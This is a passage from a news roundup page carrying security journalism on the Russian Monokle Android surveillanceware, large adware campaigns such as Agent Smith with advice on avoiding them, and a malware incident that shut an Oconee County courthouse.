email sign-off. The researchers said that one bot can send up to 1,500 emails in an hour, and as of August 8, the bitcoin address included in the sextortion email had received four payments. Sextortion campaigns and phishing attacks that can give a hacker access to your desktop are hardly unique forms of online exploitation, but this newly spotted malware indicates that they aren’t going anywhere and that people are still easily duped by inarguably unsettling threats. The researchers also note that the operators of this malware tweaked it a lot over the course of two months, indicating that they “are inclined to experiment with new features that could bring a better monetization of their work.” In this case, the best way to scare French internet users into paying a gross grifter in return for peace of mind. Source
  23. Advanced mobile surveillanceware, made in Russia, found in the wild Monokle infected Android devices, but evidence suggests iOS versions may also exist. Enlarge Big Brother Utopia Researchers have discovered some of the most advanced and full-featured mobile surveillanceware ever seen. Dubbed Monokle and used in the wild since at least March 2016, the Android-based application was developed by a Russian defense contractor that was sanctioned in 2016 for helping that country’s Main Intelligence Directorate meddle in the 2016 US presidential election. Monokle uses several novel tools, including the ability to modify the Android trusted-certificate store and a command-and-control network that can communicate over Internet TCP ports, email, text messages, or phone calls. The result: Monokle provides a host of surveillance capabilities that work even when an Internet connection is unavailable. According to a report published by Lookout, the mobile security provider that found Monokle is able to: Retrieve calendar information including name of event, when and where it is taking place, and description Perform man-in-the-middle attacks against HTTPS traffic and other types of TLS-protected communications Collect account information and retrieve messages for WhatsApp, Instagram, VK, Skype, imo Receive out-of-band messages via keywords (control phrases) delivered via SMS or from designated control phones Send text messages to an attacker-specified number Reset a user’s pincode Record environmental audio (and specify high, medium, or low quality) Make outgoing calls Record calls Interact with popular office applications to retrieve document text Take photos, videos, and screenshots Log passwords, including phone unlock PINs and key presses Retrieve cryptographic salts to aid in obtaining PINs and passwords stored on the device Accept commands from a set of specified phone numbers Retrieve contacts, emails, call histories, browsing histories, accounts and corresponding passwords Get device information including make, model, power levels, whether connections are over Wi-Fi or mobile data, and whether screen is on or off Execute arbitrary shell commands, as root, if root access is available Track device location Get nearby cell tower info List installed applications Get nearby Wi-Fi details Delete arbitrary files Download attacker-specified files Reboot a device Uninstall itself and remove all traces from an infected phone Commands in some of the Monokle samples Lookout researchers analyzed lead them to believe that there may be versions of Monokle developed for devices running Apple’s iOS. Unused in the Android samples, the commands were likely added unintentionally. The commands controlled iOS functions for the keychain, iCloud connections, iWatch accelerometer data, iOS permissions, and other iOS features or services. Lookout researchers didn’t find any iOS samples, but they believe iOS versions may be under development. Monokle gets its name from a malware component a developer titled "monokle-agent." From Russia with… Lookout researchers were able to tie Monokle to Special Technology Centre Ltd. (STC), a St. Petersburg, Russia, defense contractor that was sanctioned in 2016 by then-President Obama for helping Russia’s GRU, or Main Intelligence Directorate, meddle in the 2016 election. Evidence linking Monokle to the contractor includes control servers the malware connects to and cryptographic certificates that sign the samples. Both are identical to those used by Defender, an Android antivirus app developed by STC. Monokle’s sophistication, combined with its possible use in nation-sponsored surveillance, evokes memories of Pegasus, a powerful set of spying apps developed for both iOS and Android devices. Developed by Israel-based NSO Group, Pegasus was used in 2016 against a dissident of the United Arab Emirates and again this year against a UK-based lawyer. Lookout researchers found Monokle folded into an extremely small number of apps, an indication the surveillance tool is used in highly targeted attacks on a limited number of people. Most of the apps contained legitimate functionality to prevent users from suspecting the apps are malicious. Based on the app titles and icons of the apps, Lookout believes targets were likely: interested in Islam interested in Ahrar al-Sham, a militant group fighting against the Syrian government and Bashar al-Assad living in or associated with the Caucasus regions of Eastern Europe interested in a messaging application called “UzbekChat” referencing the Central Asian nation and former Soviet republic Uzbekistan Many of the icons and titles have been stolen from legitimate applications to disguise Monokle’s purpose. Enlarge Lookout Other titles used familiar words like Google Update, Flashlight, and Security Update Service to appear innocuous to the intended target. Titles are mostly in English with a smaller number in Arabic and Russian. While only a small number of samples have been found in the wild, a larger number of samples dates back as long ago as 2015. As the graph below shows, they follow a fairly regular development cycle. Enlarge / Signing dates of Monokle samples. Lookout STC is best known for developing radio frequency measurement equipment and unmanned aerial vehicles. It claims to employ 1,000 to 5,000 people. It develops a suite of Android security products, including Defender, that are intended for government customers. Lookout monitored Russian job search sites for positions open at STC and found they required experience in both Android and iOS. As noted earlier, the control servers and signing certificates used by the Android defensive software were in many cases identical to those used by Monokle. Monokle’s design is consistent with a professional development company that sells to governments. The surveillanceware defines 78 separate tasks—including “gathers call logs,” “collects SMS messages,” “collects contacts,” and “gets list of files in particular system directories”—that control servers can send through SMS, email, or TCP connections. Control phrases used to invoke the commands—including “connect,” “delete,” “location,” and “audio”—are short and vague enough that, should an end user see them appear in a text message, they aren’t likely to arouse suspicions. Infected phones can also receive calls from specific numbers that will turn off headsets and allow the device on the other end to record nearby sounds. There are clear differences between Monokle and Pegasys, including the fact that the latter came packaged with powerful exploits that install the surveillance malware with little interaction required of the end user. By contrast, there are no accompanying exploits for Monokle, and Lookout researchers still aren’t sure how it gets installed. The chances of ordinary people being infected with either of these types of malware are extremely small. Still, Lookout’s report provides more than 80 so-called indicators of compromise that allow security products and more technically inclined end users to detect infections. Lookout customers have been protected against Monokle since early last year. Source: Advanced mobile surveillanceware, made in Russia, found in the wild (Ars Technica)
  24. When you think of malware, it's understandable if your mind first goes to elite hackers launching sophisticated dragnets. But unless you're being targeted by a nation-state or advanced crime syndicate, you're unlikely to encounter these ultra-technical threats yourself. Run-of-the-mill profit-generating malware, on the other hand, is rampant. And the type you're most likely to encounter is adware. In your daily life you probably don't think much about adware, software that illicitly sneaks ads into your apps and browsers as a way of generating bogus revenue. Remember pop-up ads? It's like that, but with special software running on your device, instead of rogue web scripts, throwing up the ads. Advertisers often pay out based on impressions, or the number of people who load their ads. So scammers have realized that the more ads they can foist upon you, the more money they pocket. Ad It Up Your smartphone offers attackers the perfect environment to unleash ad malware. Attackers can distribute apps tainted with adware through third-party app stores for Android and even sneak adware-laced apps into the Google Play Store or Apple's App Store. They can reach millions of devices quickly, lurking on your phone, say, while their servers spew ads that run in the background of your device or right on the screen. It doesn't require elaborate hacking techniques. It isn't trying to steal your money. At worst, it makes your device a little slower or forces you to close out some unexpected ads. Adware could be on your phone right now. "With adware—which is in my opinion one of the boldest types of malware on the mobile front—we can see that the actors are basically following the money," says Aviran Hazum, analysis and response team leader at security firm Check Point. "A lot of victims will pay a ransomware ransom, or attackers can gain access to a bank account, but the probability of that is relatively low compared to the amount of money they can generate by displaying ads. More audience, more adware, more revenue." Strains of adware regularly infect tens of millions or even hundreds of millions of devices at a time. Even though adware detections have declined year over year, security firm Malwarebytes still ranked it as the most prevalent type of consumer malware in 2018. Check Point published findings on one example last week, dubbed Agent Smith, which infected more than 25 million Android devices around the world. Fifteen million of those are in India, but Check Point also found more than 300,000 infections in the US. Check Point sees signs that attackers started developing Agent Smith adware in 2016 and have been refining it ever since. Distributed largely through the third-party Android app store 9Apps, the adware was originally a more clunky, obvious type of malware that masqueraded as legitimate apps but asked for a suspicious number of device permissions to run and displayed a lot of intrusive ads. In spring 2018, though, Agent Smith evolved. Attackers added other malware components so that once the adware was installed, it would search through the device's third-party apps and replace as many as possible with malicious decoys. The initial malware would be in apps like shoddy games, photo services, or sex-related apps. But once installed, it would masquerade as a Google update utility—like a fake app called Google Updater—or apps that pretended to sell Google products, to have a better chance of hiding in plain sight. Agent Smith also infiltrated the Google Play Store during 2018, hidden in 11 apps that contained a software development kit related to the campaign. Some of these apps had about 10 million downloads in total, but the Agent Smith functionality was dormant and may have represented a planned next step for the actors. Google has removed these tainted apps. Check Point's Hazum points out that the actors behind Agent Smith also overhauled its infrastructure in 2018 and moved its command and control framework to Amazon Web Services. This way, the attackers could expand features like logging and more easily monitor analytics like download stats. Campaigns like adware and cryptojacker distribution can often function on legitimate infrastructure platforms like AWS, because it's difficult to distinguish their malicious activity from legitimate operations. In other recent adware campaigns, researchers have found innovations like malware that takes advantage of smartphone display and accessibility settings to overlay invisible ads that give them credit with ad networks without users even seeing anything. "You’re starting to see actors realizing that just regular adware won’t do these days," Check Point's Hazum says. "If you want the big money you need to invest in infrastructure and research and development." It's an Ad, Ad, Ad, Ad World Agent Smith is just one wave, though, in a sea of massive adware campaigns that impact hundreds of millions of users combined. For example, in late 2017, adware known as Fireball infected more than 250 million PCs. Imposter Fortnite apps started spreading adware on Android during the summer of 2018. And in April researchers found 50 adware-ridden apps in Google Play that had been down­loaded more than 30 million times. Almost any popular app spawns adware clones almost immediately—even FaceApp. Though adware isn't necessarily an immediate threat to users, even when it's on their devices, it opens the door for attackers to add other malicious functionality in the future that could endanger users' data or accounts. And adware can also come bundled with other types of malware, portending worse attacks to come. “Specific to adware, a lot of the risk to the user comes in applications that download extra stuff or redirect users to other websites,” says Ronnie Tokazowski, a senior threat researcher at email security firm Agari. “Many forms of adware are sold through a pay-to-install model, so the more things that get installed on an end user’s phone or PC, the more the actor gets.” To avoid downloading adware in the first place, use official app stores to download software, stick to prominent, mainstream apps as much as possible, and always double-check that you're actually downloading, say, the real Twitter app and not Twltter. To eliminate adware that could already be on your device, go through your apps and delete anything you don't use anymore, or any apps that are particularly glitchy or ad-ridden, such as random games or utilities like flashlight apps. And if you want an outside opinion, you can download reputable adware scanners from antivirus companies like Bitdefender, Malwarebytes, or Avast. Most offer a free trial. But be careful to download the real deal—adware and other malware loves to hide in apps that pretend to be adware scanners. Adware isn't the powerful and deeply invasive malware that nation-state hackers specially craft for tailored reconnais­sance or intimidation. But it's the malware most likely to show up on your phone, which makes it the type that's most important to look out for. Source
  25. The Oconee County Courthouse has been closed and computer servers at nearly every Oconee County government office have been compromised by software designed to disrupt computer systems, Sheriff Mike Crenshaw said Thursday afternoon. Government offices affected are along Pine Street in Walhalla, and they include the treasurer's office, the assessor, the auditor's office, administrative buildings and the solid waste division. It's not yet clear whether or how much residents' personal information may have been compromised as a result of the breach. "We're working to figure that out, and if it has been, we will notify people," Crenshaw said. The Oconee County Sheriff's Office and its 911 communications systems are among the only government agencies not affected because they operate on different computer servers, Crenshaw said. The Oconee County School District also has offices on Pine Street, but those systems are unaffected, he said. "The county basically had to shut down offices because most folks simply couldn't do business," he said. A team assessed the damage until Thursday evening. County Administrator Amanda Brock said in a prepared statement Thursday night that all Oconee County government offices would reopen Friday morning, but that "some offices may have limited resources" until computer systems are restored. The FBI and a computer-crimes unit of the State Law Enforcement Division have been called in to assist the Sheriff's Office and the county's information technology division with the investigation. It's not yet clear how the malware, or malicious software, made it past various firewalls used by the computer system. Crenshaw said the investigation is still in its early stages and many questions remain unanswered. Source
  • Create New...